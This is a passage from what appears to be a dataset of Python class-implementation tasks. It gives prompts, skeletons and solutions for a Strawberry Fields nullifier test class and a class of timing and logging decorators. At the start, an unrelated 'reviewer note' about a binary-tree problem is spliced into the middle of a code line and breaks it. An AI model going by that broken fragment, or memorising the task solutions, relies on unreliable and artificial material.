for y in 
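Reviewer note on the maxAncestorDiff record above: the bottom-up helper is correct; for comparison, the same answer falls out of a top-down pass that carries the min/max value seen on the root-to-node path. A hedged equivalent sketch, assuming a non-empty tree of standard nodes with `.val`, `.left`, `.right`:

class SolutionTopDown:
    # Equivalent one-pass variant of the record above: carry the extremes
    # of the path from the root and take the spread once a path ends.
    def maxAncestorDiff(self, root):
        def dfs(node, lo, hi):
            if node is None:
                return hi - lo
            lo = min(lo, node.val)
            hi = max(hi, node.val)
            return max(dfs(node.left, lo, hi), dfs(node.right, lo, hi))
        return dfs(root, root.val, root.val)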
reshaped_samples])\ndelta = np.var(nullifier_samples, axis=0)\nassert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))"], "bodies_text": "<|body_start_0|>\n np.random.seed(42)\n vac_modes = 1\n sq_r = 5.0\n c = 2\n shots = 100\n alpha = [0, np.pi / 4] * c\n phi = [np.pi / 2, 0] * c\n theta = [np.pi / 2, 0, 0, np.pi / 2]\n timebins_per_shot = len(alpha)\n samples = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples = move_vac_modes(samples, 2, crop=True)\n X0 = reshaped_samples[:, 0, 0]\n X1 = reshaped_samples[:, 0, 1]\n P2 = reshaped_samples[:, 0, 2]\n P3 = reshaped_samples[:, 0, 3]\n rtol = 5 / np.sqrt(shots)\n minusstdX1X0 = (X1 - X0).var()\n plusstdX1X0 = (X1 + X0).var()\n squeezed_std = np.exp(-2 * sq_r)\n expected_minus = sf.hbar * squeezed_std\n expected_plus = sf.hbar / squeezed_std\n assert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\n assert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\n minusstdP2P3 = (P2 - P3).var()\n plusstdP2P3 = (P2 + P3).var()\n assert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\n assert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)\n<|end_body_0|>\n\n<|body_start_1|>\n np.random.seed(42)\n vac_modes = 1\n n = 4\n shots = 100\n sq_r = 5\n alpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\n alpha[0] = 0.0\n phi = [0] * n\n phi[0] = np.pi / 2\n timebins_per_shot = len(alpha)\n theta = [0] * n\n samples_X = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\n theta = [np.pi / 2] * n\n samples_P = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\n nullifier_X = lambda sample: (sample - sample[-1])[:-1]\n val_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\n assert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n val_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\n assert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_1|>\n\n<|body_start_2|>\n np.random.seed(42)\n vac_modes = 1\n n = 20\n shots = 100\n sq_r = 3\n alpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\n alpha = [alpha_c] * n\n alpha[0] = 0.0\n phi = [np.pi / 2] * n\n theta = [0, np.pi / 2] * (n // 2)\n timebins_per_shot = len(alpha)\n reshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\n nullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\n nullifier_samples = np.array([nullifier(y[0]) for y in reshaped_samples])\n delta = np.var(nullifier_samples, axis=0)\n assert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_2|>\n", "class_docstring": "Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.", "class_name": "TestSingleLoopNullifier", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestSingleLoopNullifier:\n \"\"\"Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.\"\"\"\n\n def test_epr(self):\n \"\"\"Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\"\"\"\n <|body_0|>\n\n def test_ghz(self):\n \"\"\"Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 
5 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_1|>\n\n def test_one_dimensional_cluster(self):\n \"\"\"Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n np.random.seed(42)\n vac_modes = 1\n sq_r = 5.0\n c = 2\n shots = 100\n alpha = [0, np.pi / 4] * c\n phi = [np.pi / 2, 0] * c\n theta = [np.pi / 2, 0, 0, np.pi / 2]\n timebins_per_shot = len(alpha)\n samples = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples = move_vac_modes(samples, 2, crop=True)\n X0 = reshaped_samples[:, 0, 0]\n X1 = reshaped_samples[:, 0, 1]\n P2 = reshaped_samples[:, 0, 2]\n P3 = reshaped_samples[:, 0, 3]\n rtol = 5 / np.sqrt(shots)\n minusstdX1X0 = (X1 - X0).var()\n plusstdX1X0 = (X1 + X0).var()\n squeezed_std = np.exp(-2 * sq_r)\n expected_minus = sf.hbar * squeezed_std\n expected_plus = sf.hbar / squeezed_std\n assert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\n assert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\n minusstdP2P3 = (P2 - P3).var()\n plusstdP2P3 = (P2 + P3).var()\n assert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\n assert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)\n<|end_body_0|>\n\n<|body_start_1|>\n np.random.seed(42)\n vac_modes = 1\n n = 4\n shots = 100\n sq_r = 5\n alpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\n alpha[0] = 0.0\n phi = [0] * n\n phi[0] = np.pi / 2\n timebins_per_shot = len(alpha)\n theta = [0] * n\n samples_X = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\n theta = [np.pi / 2] * n\n samples_P = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\n nullifier_X = lambda sample: (sample - sample[-1])[:-1]\n val_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\n assert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n val_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\n assert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_1|>\n\n<|body_start_2|>\n np.random.seed(42)\n vac_modes = 1\n n = 20\n shots = 100\n sq_r = 3\n alpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\n alpha = [alpha_c] * n\n alpha[0] = 0.0\n phi = [np.pi / 2] * n\n theta = [0, np.pi / 2] * (n // 2)\n timebins_per_shot = len(alpha)\n reshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\n nullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\n nullifier_samples = np.array([nullifier(y[0]) for y in reshaped_samples])\n delta = np.var(nullifier_samples, axis=0)\n assert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000116", "length_bytes": 29620, "license_type": "permissive", "methods": [{"docstring": "Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples", "name": "test_epr", "signature": "def test_epr(self)"}, {"docstring": "Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 
5 of https://advances.sciencemag.org/content/5/5/eaaw4530", "name": "test_ghz", "signature": "def test_ghz(self)"}, {"docstring": "Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530", "name": "test_one_dimensional_cluster", "signature": "def test_one_dimensional_cluster(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_003048", "prompt": "Implement the Python class `TestSingleLoopNullifier` described below.\n\nClass description:\nGroups tests where a nullifier associated with a state generated by a oneloop setup is checked.\n\nMethod signatures and docstrings:\n- def test_epr(self): Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\n- def test_ghz(self): Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\n- def test_one_dimensional_cluster(self): Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530", "prompted_full_text": "Implement the Python class `TestSingleLoopNullifier` described below.\n\nClass description:\nGroups tests where a nullifier associated with a state generated by a oneloop setup is checked.\n\nMethod signatures and docstrings:\n- def test_epr(self): Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\n- def test_ghz(self): Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\n- def test_one_dimensional_cluster(self): Test that the nullifier have the correct value in the experiment described in See Eq. 10 of https://advances.sciencemag.org/content/5/5/eaaw4530\n\n<|skeleton|>\nclass TestSingleLoopNullifier:\n \"\"\"Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.\"\"\"\n\n def test_epr(self):\n \"\"\"Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\"\"\"\n <|body_0|>\n\n def test_ghz(self):\n \"\"\"Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_1|>\n\n def test_one_dimensional_cluster(self):\n \"\"\"Test that the nullifier have the correct value in the experiment described in See Eq. 
10 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n np.random.seed(42)\n vac_modes = 1\n sq_r = 5.0\n c = 2\n shots = 100\n alpha = [0, np.pi / 4] * c\n phi = [np.pi / 2, 0] * c\n theta = [np.pi / 2, 0, 0, np.pi / 2]\n timebins_per_shot = len(alpha)\n samples = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples = move_vac_modes(samples, 2, crop=True)\n X0 = reshaped_samples[:, 0, 0]\n X1 = reshaped_samples[:, 0, 1]\n P2 = reshaped_samples[:, 0, 2]\n P3 = reshaped_samples[:, 0, 3]\n rtol = 5 / np.sqrt(shots)\n minusstdX1X0 = (X1 - X0).var()\n plusstdX1X0 = (X1 + X0).var()\n squeezed_std = np.exp(-2 * sq_r)\n expected_minus = sf.hbar * squeezed_std\n expected_plus = sf.hbar / squeezed_std\n assert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\n assert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\n minusstdP2P3 = (P2 - P3).var()\n plusstdP2P3 = (P2 + P3).var()\n assert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\n assert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)\n<|end_body_0|>\n\n<|body_start_1|>\n np.random.seed(42)\n vac_modes = 1\n n = 4\n shots = 100\n sq_r = 5\n alpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\n alpha[0] = 0.0\n phi = [0] * n\n phi[0] = np.pi / 2\n timebins_per_shot = len(alpha)\n theta = [0] * n\n samples_X = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\n theta = [np.pi / 2] * n\n samples_P = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\n nullifier_X = lambda sample: (sample - sample[-1])[:-1]\n val_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\n assert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n val_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\n assert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_1|>\n\n<|body_start_2|>\n np.random.seed(42)\n vac_modes = 1\n n = 20\n shots = 100\n sq_r = 3\n alpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\n alpha = [alpha_c] * n\n alpha[0] = 0.0\n phi = [np.pi / 2] * n\n theta = [0, np.pi / 2] * (n // 2)\n timebins_per_shot = len(alpha)\n reshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\n nullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\n nullifier_samples = np.array([nullifier(y[0]) for y in reshaped_samples])\n delta = np.var(nullifier_samples, axis=0)\n assert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n<|end_body_2|>\n", "revision_id": "0c1c805fd5dfce465a8955ee3faf81037023a23e", "skeleton": "<|skeleton|>\nclass TestSingleLoopNullifier:\n \"\"\"Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.\"\"\"\n\n def test_epr(self):\n \"\"\"Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\"\"\"\n <|body_0|>\n\n def test_ghz(self):\n \"\"\"Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_1|>\n\n def test_one_dimensional_cluster(self):\n \"\"\"Test that the nullifier have the correct value in the experiment described in See Eq. 
10 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestSingleLoopNullifier:\n \"\"\"Groups tests where a nullifier associated with a state generated by a oneloop setup is checked.\"\"\"\n\n def test_epr(self):\n \"\"\"Generates an EPR state and checks that the correct correlations (noise reductions) are observed from the samples\"\"\"\n np.random.seed(42)\n vac_modes = 1\n sq_r = 5.0\n c = 2\n shots = 100\n alpha = [0, np.pi / 4] * c\n phi = [np.pi / 2, 0] * c\n theta = [np.pi / 2, 0, 0, np.pi / 2]\n timebins_per_shot = len(alpha)\n samples = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples = move_vac_modes(samples, 2, crop=True)\n X0 = reshaped_samples[:, 0, 0]\n X1 = reshaped_samples[:, 0, 1]\n P2 = reshaped_samples[:, 0, 2]\n P3 = reshaped_samples[:, 0, 3]\n rtol = 5 / np.sqrt(shots)\n minusstdX1X0 = (X1 - X0).var()\n plusstdX1X0 = (X1 + X0).var()\n squeezed_std = np.exp(-2 * sq_r)\n expected_minus = sf.hbar * squeezed_std\n expected_plus = sf.hbar / squeezed_std\n assert np.allclose(minusstdX1X0, expected_minus, rtol=rtol)\n assert np.allclose(plusstdX1X0, expected_plus, rtol=rtol)\n minusstdP2P3 = (P2 - P3).var()\n plusstdP2P3 = (P2 + P3).var()\n assert np.allclose(minusstdP2P3, expected_plus, rtol=rtol)\n assert np.allclose(plusstdP2P3, expected_minus, rtol=rtol)\n\n def test_ghz(self):\n \"\"\"Generates a GHZ state and checks that the correct correlations (noise reductions) are observed from the samples See Eq. 5 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n np.random.seed(42)\n vac_modes = 1\n n = 4\n shots = 100\n sq_r = 5\n alpha = [np.arccos(np.sqrt(1 / (n - i + 1))) if i != n + 1 else 0 for i in range(n)]\n alpha[0] = 0.0\n phi = [0] * n\n phi[0] = np.pi / 2\n timebins_per_shot = len(alpha)\n theta = [0] * n\n samples_X = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_X = move_vac_modes(samples_X, 2, crop=True)\n theta = [np.pi / 2] * n\n samples_P = singleloop(sq_r, alpha, phi, theta, shots)\n reshaped_samples_P = move_vac_modes(samples_P, 2, crop=True)\n nullifier_X = lambda sample: (sample - sample[-1])[:-1]\n val_nullifier_X = np.var([nullifier_X(x[0]) for x in reshaped_samples_X], axis=0)\n assert np.allclose(val_nullifier_X, sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n val_nullifier_P = np.var([np.sum(p[0]) for p in reshaped_samples_P], axis=0)\n assert np.allclose(val_nullifier_P, 0.5 * sf.hbar * n * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n\n def test_one_dimensional_cluster(self):\n \"\"\"Test that the nullifier have the correct value in the experiment described in See Eq. 
10 of https://advances.sciencemag.org/content/5/5/eaaw4530\"\"\"\n np.random.seed(42)\n vac_modes = 1\n n = 20\n shots = 100\n sq_r = 3\n alpha_c = np.arccos(np.sqrt((np.sqrt(5) - 1) / 2))\n alpha = [alpha_c] * n\n alpha[0] = 0.0\n phi = [np.pi / 2] * n\n theta = [0, np.pi / 2] * (n // 2)\n timebins_per_shot = len(alpha)\n reshaped_samples = singleloop(sq_r, alpha, phi, theta, shots)\n nullifier = lambda x: np.array([-x[i - 2] + x[i - 1] - x[i] for i in range(2, len(x) - 2, 2)])[1:]\n nullifier_samples = np.array([nullifier(y[0]) for y in reshaped_samples])\n delta = np.var(nullifier_samples, axis=0)\n assert np.allclose(delta, 1.5 * sf.hbar * np.exp(-2 * sq_r), rtol=5 / np.sqrt(shots))\n", "source": "the_stack_v2_python_sparse", "source_path": "artifacts/old_dataset_versions/original_commits/strawberryfields/strawberryfields#611/before/test_tdmprogram.py", "source_repo": "MattePalte/Bugs-Quantum-Computing-Platforms", "split": "test", "star_events_count": 4} {"blob_id": "dd24ee8c8805e85348974c914551a1525393978c", "bodies": ["def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\nreturn wrapper", "@wraps(f)\ndef wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\nreturn wrapp", "def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\nreturn wrapp", "@wraps(f)\ndef wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\nreturn wrapp", "@wraps(f)\ndef wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return wrapp.value\n return print(\"It's already finished\")\nwrapp.value = False\nreturn wrapp"], "bodies_text": "<|body_start_0|>\n def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\n return wrapper\n<|end_body_0|>\n\n<|body_start_1|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\n return wrapp\n<|end_body_1|>\n\n<|body_start_2|>\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\n return wrapp\n<|end_body_2|>\n\n<|body_start_3|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n 
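Reviewer note on the TestSingleLoopNullifier record above: `vac_modes` and `timebins_per_shot` are assigned but never used in any of the three tests, and every assertion reduces to "sample variance matches hbar*exp(±2r) within rtol = 5/sqrt(shots)". A self-contained illustration of that check with plain numpy — synthetic Gaussian samples standing in for the Strawberry Fields sampler, and hbar = 2 assumed as SF's default convention:

import numpy as np

# Draw samples whose +/- quadrature combinations are (anti-)squeezed and
# assert their variances match hbar*exp(-2r) within the Monte Carlo tolerance.
np.random.seed(42)
hbar = 2.0                              # assumed Strawberry Fields default
sq_r, shots = 1.0, 10_000
var_minus = hbar * np.exp(-2 * sq_r)    # squeezed combination
var_plus = hbar * np.exp(2 * sq_r)      # anti-squeezed combination
minus = np.random.normal(0.0, np.sqrt(var_minus), shots)
plus = np.random.normal(0.0, np.sqrt(var_plus), shots)
rtol = 5 / np.sqrt(shots)               # same heuristic tolerance as the tests
assert np.allclose(minus.var(), var_minus, rtol=rtol)
assert np.allclose(plus.var(), var_plus, rtol=rtol)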
values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\n return wrapp\n<|end_body_3|>\n\n<|body_start_4|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return wrapp.value\n return print(\"It's already finished\")\n wrapp.value = False\n return wrapp\n<|end_body_4|>\n", "class_docstring": "", "class_name": "Decorators", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Decorators:\n\n def decor0(self, func):\n \"\"\"декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_0|>\n\n def decor1(self, f):\n \"\"\"декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_1|>\n\n def decor2(self, f):\n \"\"\"декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\"\"\"\n <|body_2|>\n\n def decor3(self, f):\n \"\"\"декоратор, проверяющий типы, переданных декорируемой функции, аргументов\"\"\"\n <|body_3|>\n\n def decor4(self, f):\n \"\"\"декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\n return wrapper\n<|end_body_0|>\n\n<|body_start_1|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\n return wrapp\n<|end_body_1|>\n\n<|body_start_2|>\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\n return wrapp\n<|end_body_2|>\n\n<|body_start_3|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\n return wrapp\n<|end_body_3|>\n\n<|body_start_4|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return wrapp.value\n return print(\"It's already finished\")\n wrapp.value = False\n return wrapp\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000117", "length_bytes": 3283, "license_type": "no_license", "methods": [{"docstring": "декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы", "name": "decor0", "signature": "def decor0(self, func)"}, {"docstring": "декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы", "name": "decor1", "signature": "def decor1(self, f)"}, {"docstring": "декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл", "name": "decor2", "signature": "def decor2(self, f)"}, {"docstring": 
"декоратор, проверяющий типы, переданных декорируемой функции, аргументов", "name": "decor3", "signature": "def decor3(self, f)"}, {"docstring": "декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции", "name": "decor4", "signature": "def decor4(self, f)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_000424", "prompt": "Implement the Python class `Decorators` described below.\n\nClass description:\nImplement the Decorators class.\n\nMethod signatures and docstrings:\n- def decor0(self, func): декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\n- def decor1(self, f): декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\n- def decor2(self, f): декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\n- def decor3(self, f): декоратор, проверяющий типы, переданных декорируемой функции, аргументов\n- def decor4(self, f): декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции", "prompted_full_text": "Implement the Python class `Decorators` described below.\n\nClass description:\nImplement the Decorators class.\n\nMethod signatures and docstrings:\n- def decor0(self, func): декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\n- def decor1(self, f): декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\n- def decor2(self, f): декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\n- def decor3(self, f): декоратор, проверяющий типы, переданных декорируемой функции, аргументов\n- def decor4(self, f): декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\n\n<|skeleton|>\nclass Decorators:\n\n def decor0(self, func):\n \"\"\"декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_0|>\n\n def decor1(self, f):\n \"\"\"декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_1|>\n\n def decor2(self, f):\n \"\"\"декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\"\"\"\n <|body_2|>\n\n def decor3(self, f):\n \"\"\"декоратор, проверяющий типы, переданных декорируемой функции, аргументов\"\"\"\n <|body_3|>\n\n def decor4(self, f):\n \"\"\"декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\n return wrapper\n<|end_body_0|>\n\n<|body_start_1|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\n return wrapp\n<|end_body_1|>\n\n<|body_start_2|>\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\n return 
wrapp\n<|end_body_2|>\n\n<|body_start_3|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\n return wrapp\n<|end_body_3|>\n\n<|body_start_4|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return wrapp.value\n return print(\"It's already finished\")\n wrapp.value = False\n return wrapp\n<|end_body_4|>\n", "revision_id": "c3225516640d872b97139a5c2919d216d5370b17", "skeleton": "<|skeleton|>\nclass Decorators:\n\n def decor0(self, func):\n \"\"\"декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_0|>\n\n def decor1(self, f):\n \"\"\"декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_1|>\n\n def decor2(self, f):\n \"\"\"декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\"\"\"\n <|body_2|>\n\n def decor3(self, f):\n \"\"\"декоратор, проверяющий типы, переданных декорируемой функции, аргументов\"\"\"\n <|body_3|>\n\n def decor4(self, f):\n \"\"\"декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": 